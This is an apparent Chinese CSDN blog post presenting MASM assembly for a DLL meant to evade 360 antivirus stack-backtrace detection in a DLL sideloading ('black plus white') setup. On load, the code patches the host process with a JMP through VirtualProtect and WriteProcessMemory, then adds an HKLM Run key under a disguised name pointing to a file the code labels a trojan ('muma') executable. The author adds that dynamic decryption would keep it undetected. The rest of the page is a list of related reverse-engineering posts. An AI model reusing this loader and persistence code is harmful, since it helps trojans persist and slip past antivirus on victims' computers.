2014过360栈回溯

最新推荐文章于 2017-06-19 15:41:01 发布
最新推荐文章于 2017-06-19 15:41:01 发布
阅读量656 收藏
点赞数
分类专栏: 逆向 汇编
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18942885/article/details/45311955
版权


360为了XX黑加白出的栈回溯技术

当然现在还会杀DLL 不过 断链动态解密一下应该还是没有问题的

博客新开,先扔出来一点儿


.486p

.model flat,stdcall

option casemap:none

assume fs:nothing


include windows.inc

include user32.inc

includelib user32.lib

include kernel32.inc

includelib kernel32.lib

include         Advapi32.inc

includelib      Advapi32.lib

.data

szKeyAutoRun        db      'Software\Microsoft\Windows\CurrentVersion\Run',0

szValueAutoRun  db      'baidusdpptoet',0   

jmpaddr dd 00

hookaddr dd 00

oldprotect dd 00

dllhandle dd 00

mumaexepatch byte "\RunTime process.exe",0

backbyte byte 5 dup  (?);备份5个字节

.code

funcxx proc

ret


funcxx endp

funcx proc


ret


funcx endp

funcxxx proc

ret


funcxxx endp


funcxaxx proc

ret


funcxaxx endp


threadx proc x:dword

invoke FreeLibraryAndExitThread,offset dllhandle,0

mov eax,0

ret


threadx endp

func proc

        local   @hKey  

local   @szFileName[MAX_PATH]:byte




invoke  RegCreateKey,HKEY_LOCAL_MACHINE,addr szKeyAutoRun ,addr @hKey

;invoke GetModuleFileName,NULL,addr @szFileName,260

invoke GetCurrentDirectory,260,addr @szFileName

invoke lstrcat,addr  @szFileName,addr   mumaexepatch

;inc     eax

;mov @szFileName,'x'

invoke lstrlen,addr @szFileName

invoke  RegSetValueEx,@hKey,offset szValueAutoRun,NULL,REG_SZ, addr @szFileName,eax

invoke  RegCloseKey,@hKey

ret


func endp

start proc x,y,z:dword

.if y==DLL_PROCESS_ATTACH

 push x

 pop dllhandle

 

 

 jmp xyz

 xyz:

  jmp pushaddr

pushaddr:

invoke GetModuleHandle,NULL

        add eax,100Bh

       mov hookaddr,eax;这里已经指向指定代码了

       mov jmpaddr,eax

;解除保护区域是hookaddr+100

nop

nop

nop

nop

nop

nop

mov byte ptr [backbyte],0E9H

mov eax,offset func

mov ebx ,hookaddr

sub eax,ebx

sub eax,5

mov dword ptr [backbyte+1],eax

invoke VirtualProtect, jmpaddr,1000,PAGE_EXECUTE_READWRITE, offset oldprotect ;

;lea eax,jmpaddr

;lea esi, offset backbyte

;cld

;movsd

;movsb

invoke GetCurrentProcess

invoke WriteProcessMemory,eax, jmpaddr,offset backbyte,5,NULL

;invoke CreateThread,NULL,NULL,offset threadx,NULL,0,NULL

jmp jmpaddr

.endif

ret


start endp


funcxxxxx proc

ret


funcxxxxx endp


end start

qq_18942885
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
恶意样本对抗回溯检测机制的套路浅析
AzulSystems的博客
03-18 194
最近发现有很多漏洞利用或木马程序样本会通过一些技术手段,达到使自动化检测系统或分析人员调试工具的回溯机制失效的目的。在本文中我将会简单分析和推测一下这类恶意样本都是通过哪些套路来实现和回溯机制的对抗。需要注意的是,文中讨论的堆都是代指线程在用户层的堆,并未涉及内核层的堆
VEH +硬件断点 HOOK
落笔飞花笑百生的博客
04-27 7595
 // dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "stdafx.h" #include "windows.h" #include #include #include #pragma comment(lib, "d3d9.lib") #pragma comment (lib,"d3dx9.lib") #pragma comment
OD用回溯法找程序流程点
谢绝留言与私信
02-11 6646
前言看别人操作时, 人家能通过回溯,找到流程点(e.g. Show Dialog, Click Button) 我自己做的时候, 和人家的上下文不一样. 自己做了下试验, 原来必须要用trace into(CTRL+F11), 才行.记录程序启动后, 在流程点即将进行前, 在OD中先停住, 打开run trace, 再trace into, 然后在进行流程操作. 等流程进行完(e
回溯----X64
商少
06-19 2919
通过X64-SEH 的学习(http://blog.csdn.net/qq_18218335/article/details/72722320)我们知道了一个函数RtlVirtualUnwind,虚拟展开函数,该函数根据epilog 和 prolog 进行虚拟的寄存器操作(在一个CONTEXT结构体中),函数执行完,CONTEXT结构体中即为函数虚拟执行完后寄存器应该有的状态,其中rip 和 rs
简单的回溯 & 简单的回溯欺骗 -- 简单分析
astrotycoon
11-11 1万+
原文地址在: http://hi.baidu.com/iceboy_/item/924f349e10c9fbcfb62531f7# 对于我这样的新手好长时间才看懂,本文就那篇文章中的程序来简单分析一下。程序如下: #include #include #include #pragma warning(disable: 4311 4312 4313) int fake_ebp
基于Python+pyqt5实现的仿360精美界面源代码
09-13
描述中提到"开发环境:python3.8.0+pyqt5.7.0",这给出了该项目开发所使用的具体技术。Python 3.8.0是Python编程语言的一个稳定版本,而PyQt5.7.0是PyQt5库的一个特定版本,用于构建图形用户界面(GUI)。开发者...
360:面向行为分析的数据治理和应用z240203.pptx
最新发布
02-04
### 360:面向行为分析的数据治理与应用 #### 一、常见数据分析场景 在当前数据驱动的时代背景下,企业需要对多种类型的数据进行深入分析,以获取有价值的洞见。这些场景主要包括: - **网站行为**:监测用户浏览...
IT各大公司笔试面试题
08-20
阿里巴巴、奇虎360、百度、美团和腾讯等知名企业,它们的招聘过程往往严谨且具有挑战性,涵盖的技术范围广泛,包括但不限于计算机科学基础、算法与数据结构、操作系统、网络、数据库、软件工程等。下面将对这些公司...
java源码 仿360buy京东商城源码 京东JavaWeb项目源代码.zip
09-14
该压缩包文件“java源码 仿360buy京东商城源码 京东JavaWeb项目源代码.zip”包含了实现一个类似360buy京东商城功能的完整JavaWeb项目源代码。这个项目对于学习和理解Java在电子商务平台开发中的应用具有很高的参考...
algorithms:这些算法来自我的CISP 360,并且使用数组和向量实现
03-18
7. **数据结构操作**:如、队列、链表等,它们可以基于数组和向量进行实现,如模拟的后进先出(LIFO)性质,或队列的先进先出(FIFO)性质。 8. **递归算法**:如计算阶乘、遍历树结构等,数组或向量可用于存储...
简单说一下 Steam平台 常用游戏的EAC反调试保护 WIN7X64
热门推荐
落笔飞花笑百生的博客
05-09 1万+
内核层:3个内核线程用于不停的恢复THREAD PROCESS-CALLBACK 直接1字节anti会开启不了驱动 这里比以前的TP好点儿               CALLBACK里面抹去了句柄的读写内存权限 导致OD看不见进程 CE搜不了内存              反附加 三个驱动里面改了线程暂停位的反附加线程 导致OD附加 游戏直接消失 还有僵尸进程
逆WIN7X64内核调试体系之NtDebugActiveProcess
落笔飞花笑百生的博客
09-27 3955
NTSTATUS __fastcall proxyNtDebugActiveProcess(HANDLE ProcessHandle, HANDLE DebugObjectHandle){         PMY_OBJECT_TYPE object;         PMY_OBJECT_TYPE debugobject;         OBJECT_HANDLE_INFORMATION
逆WIN7X64内核调试之NTCreateDebugObject
落笔飞花笑百生的博客
09-28 3296
NTSTATUS __fastcall proxyNtCreateDebugObject(         OUT PHANDLE DebugObjectHandle,         IN ACCESS_MASK DesiredAccess,         IN POBJECT_ATTRIBUTES ObjectAttributes,         IN ULONG Flags  
win 10 64 14393遍历进程VAD
落笔飞花笑百生的博客
04-01 3192
typedef struct _SEGMENT{  /*(*((ntkrnlmp!_SEGMENT *)0xffffa405114286d0))[Type:_SEGMENT]   [+0x000] ControlArea      : 0xffffd18b3276d370[Type:_CONTROL_AREA *]   [+0x008] TotalNumberOfPtes : 0xa[Typ
做X64 shadow SSDT HOOK引擎那些事儿~~
落笔飞花笑百生的博客
09-23 2443
废话不多少 我做HOOK引擎遇到的事儿~~~ 先看一下代码 ,里面有详细地址 .text:FFFFF97FFF072744 NtUserGetForegroundWindow proc near     ; DATA XREF: .text:FFFFF97FFF0D20E0o .text:FFFFF97FFF072744                                 
驱动遍历句柄表
落笔飞花笑百生的博客
04-27 2095
 驱动遍历句柄表附加第二个方法的反汇编代码 其中还有对其拦截的方式的一些需要HOOK处比如伪造句柄表 因为大量使用硬编码所以此份代码通用性不强一切均在虚拟机XP3下操作 #include "ntddk.h" typedef struct _EX_PUSH_LOCK {  //  // LOCK bit is set for both exclusive and shared acq
2014简单绕过某60父进程查杀
落笔飞花笑百生的博客
04-27 1763
 ;落笔飞花笑百生 ;2014.12.9 ;过360父进程一个弱弱的方法 ;过360启动项 .386 .model flat,stdcall option casemap:none include windows.inc includelib kernel32.lib include kernel32.inc include user32.inc include
驱动中使用加载回调来监控进程加载 或者DLL加载 驱动加载
落笔飞花笑百生的博客
04-27 1689
 #include "ntddk.h" //#include "Ntifs.h" //PVOID NTSTATUS PsSetLoadImageNotifyRoutine(  PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine); NTSTATUS PsRemoveLoadImageNotifyRoutine( __in PLOAD_IMAG
NTCreateDEbugOBject for win8..1
落笔飞花笑百生的博客
04-27 1397
这个代码可以在WIN8.1上面跑的  测试成功 自己测试的时候呢 把ObInsertObjectEx,DbgkDebugObjectType替换一下 最后用符号连接就完美了 这个不像昨天的那个伪代码 这个可以跑的 我跟着调试了一遍代码也是没有用IDA了  IDA太坑 NTSTATUS NTCreateDebugObject(OUT PHANDLE DebugObjectHandle
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值